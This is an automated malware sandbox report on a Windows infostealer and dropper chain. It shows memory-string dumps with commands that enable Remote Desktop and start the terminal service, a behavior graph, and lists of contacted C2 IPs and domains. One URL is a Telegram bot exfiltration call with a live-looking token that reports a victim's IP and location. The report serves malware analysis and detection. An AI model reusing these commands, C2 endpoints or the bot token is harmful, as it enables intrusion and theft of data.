jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000025.00000000.2594215239.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000025.00000000.2594215239.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000026.00000000.2605199027.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000026.00000000.2605199027.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000026.00000002.2931326382.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000026.00000002.2931326382.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0017EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 5_2_0017EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0017DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 5_2_0017DF51
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579277 Sample: file.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 117 api.telegram.org 2->117 119 treehoneyi.click 2->119 121 4 other IPs or domains 2->121 143 Suricata IDS alerts for network traffic 2->143 145 Found malware configuration 2->145 147 Malicious sample detected (through community Yara rule) 2->147 151 15 other signatures 2->151 11 skotes.exe 37 2->11         started        16 file.exe 5 2->16         started        18 Intel_PTT_EK_Recertification.exe 2->18         started        20 4 other processes 2->20 signatures3 149 Uses the Telegram API (likely for C&C communication) 117->149 process4 dnsIp5 135 185.215.113.43, 49748, 49754, 49786 WHOLESALECONNECTIONSNL Portugal 11->135 137 31.41.244.11, 49760, 49787, 49809 AEROEXPRESS-ASRU Russian Federation 11->137 99 C:\Users\user\AppData\...\322c3dce5b.exe, PE32 11->99 dropped 101 C:\Users\user\AppData\...\4cdf81e042.exe, PE32 11->101 dropped 103 C:\Users\user\AppData\...\b7c03317c9.exe, PE32 11->103 dropped 109 11 other malicious files 11->109 dropped 189 Hides threads from debuggers 11->189 211 2 other signatures 11->211 22 b2885fa695.exe 11->22         started        26 5f0a381314.exe 8 11->26         started        29 b7c03317c9.exe 11->29         started        39 4 other processes 11->39 105 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->105 dropped 107 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->107 dropped 191 Detected unpacking (changes PE section rights) 16->191 193 Tries to evade debugger and weak emulator (self modifying code) 16->193 195 Tries to detect virtualization through RDTSC time measurements 16->195 31 skotes.exe 16->31         started        197 Antivirus detection for dropped file 18->197 199 Multi AV Scanner detection for dropped file 18->199 201 Suspicious powershell command line found 18->201 213 3 other signatures 18->213 33 powershell.exe 18->33         started        35 explorer.exe 18->35         started        139 212.193.31.8, 49830, 49849, 49859 SPD-NETTR Russian Federation 20->139 203 Creates files in the system32 config directory 20->203 205 Contains functionality to start a terminal service 20->205 207 Injects code into the Windows Explorer (explorer.exe) 20->207 209 Tries to harvest and steal browser information (history, passwords, etc) 20->209 37 powershell.exe 20->37         started        41 2 other processes 20->41 file6 signatures7 process8 dnsIp9 123 cheapptaxysu.click 104.21.67.146, 443, 49805, 49810 CLOUDFLARENETUS United States 22->123 153 Antivirus detection for dropped file 22->153 155 Multi AV Scanner detection for dropped file 22->155 157 Detected unpacking (changes PE section rights) 22->157 175 7 other signatures 22->175 91 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 26->91 dropped 93 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 26->93 dropped 159 Contains functionality to register a low level keyboard hook 26->159 43 cmd.exe 2 26->43         started        125 httpbin.org 98.85.100.80 TWC-11351-NORTHEASTUS United States 29->125 127 home.fivetk5ht.top 185.121.15.192 REDSERVICIOES Spain 29->127 161 Tries to detect sandboxes and other dynamic analysis tools (window names) 29->161 163 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 29->163 165 Hides threads from debuggers 29->165 167 Machine Learning detection for dropped file 31->167 169 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 31->169 177 3 other signatures 31->177 46 PING.EXE 33->46         started        49 conhost.exe 33->49         started        51 conhost.exe 37->51         started        53 PING.EXE 37->53         started        129 api.telegram.org 149.154.167.220 TELEGRAMRU United Kingdom 39->129 131 drive.google.com 172.217.17.46, 443, 49846, 49852 GOOGLEUS United States 39->131 133 3 other IPs or domains 39->133 95 C:\Users\user\AppData\Local\...behaviorgraphxtuum.exe, PE32 39->95 dropped 97 C:\Program Files\...\graph.exe, PE32+ 39->97 dropped 171 Contains functionality to start a terminal service 39->171 173 LummaC encrypted strings found 39->173 55 Gxtuum.exe 39->55         started        57 graph.exe 39->57         started        59 conhost.exe 39->59         started        file10 signatures11 process12 dnsIp13 181 Uses cmd line tools excessively to alter registry or file data 43->181 61 in.exe 1 43->61         started        65 7z.exe 2 43->65         started        67 7z.exe 3 43->67         started        69 9 other processes 43->69 141 127.1.10.1 unknown unknown 46->141 183 Multi AV Scanner detection for dropped file 55->183 185 Contains functionality to start a terminal service 55->185 187 Machine Learning detection for dropped file 55->187 signatures14 process15 file16 111 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 61->111 dropped 215 Suspicious powershell command line found 61->215 217 Uses cmd line tools excessively to alter registry or file data 61->217 219 Uses schtasks.exe or at.exe to add and modify task schedules 61->219 71 powershell.exe 61->71         started        74 attrib.exe 1 61->74         started        76 attrib.exe 1 61->76         started        78 schtasks.exe 61->78         started        113 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 65->113 dropped signatures17 process18 signatures19 179 Uses ping.exe to check the status of other devices and networks 71->179 80 PING.EXE 71->80         started        83 conhost.exe 71->83         started        85 conhost.exe 74->85         started        87 conhost.exe 76->87         started        89 conhost.exe 78->89         started        process20 dnsIp21 115 127.0.0.1 unknown unknown 80->115
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.121.15.192
 home.fivetk5ht.top Spain
207046 REDSERVICIOES false
98.85.100.80
 httpbin.org United States
11351 TWC-11351-NORTHEASTUS false
212.193.31.8
 unknown Russian Federation
57844 SPD-NETTR true
172.217.17.46
 drive.google.com United States
15169 GOOGLEUS false
34.117.59.81
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
104.21.91.209
 treehoneyi.click United States
13335 CLOUDFLARENETUS false
172.217.17.65
 drive.usercontent.google.com United States
15169 GOOGLEUS false
104.21.67.146
 cheapptaxysu.click United States
13335 CLOUDFLARENETUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false
127.1.10.1
 unknown unknown
unknown unknown true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fivetk5ht.top 185.121.15.192 true
treehoneyi.click 104.21.91.209 true
cheapptaxysu.click 104.21.67.146 true
ipinfo.io 34.117.59.81 true
drive.google.com 172.217.17.46 true
drive.usercontent.google.com 172.217.17.65 true
api.telegram.org 149.154.167.220 true
httpbin.org 98.85.100.80 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
aspecteirs.lat false
    		high
    http://212.193.31.8/3ofn3jf3e2ljk2/index.php true
      		unknown
      http://185.215.113.43/Zu7JuNko/index.php false
        		high
        treehoneyi.click true
          		unknown
          https://ipinfo.io/json false
            		high
            sustainskelet.lat false
              		high
              rapeflowwj.lat false
                		high
                https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20494126%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML false
                  		high
                  energyaffai.lat false
                    		high
                    http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763 true
                      		unknown
                      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851 false
                        		high
                        grannyejh.lat false
                          		high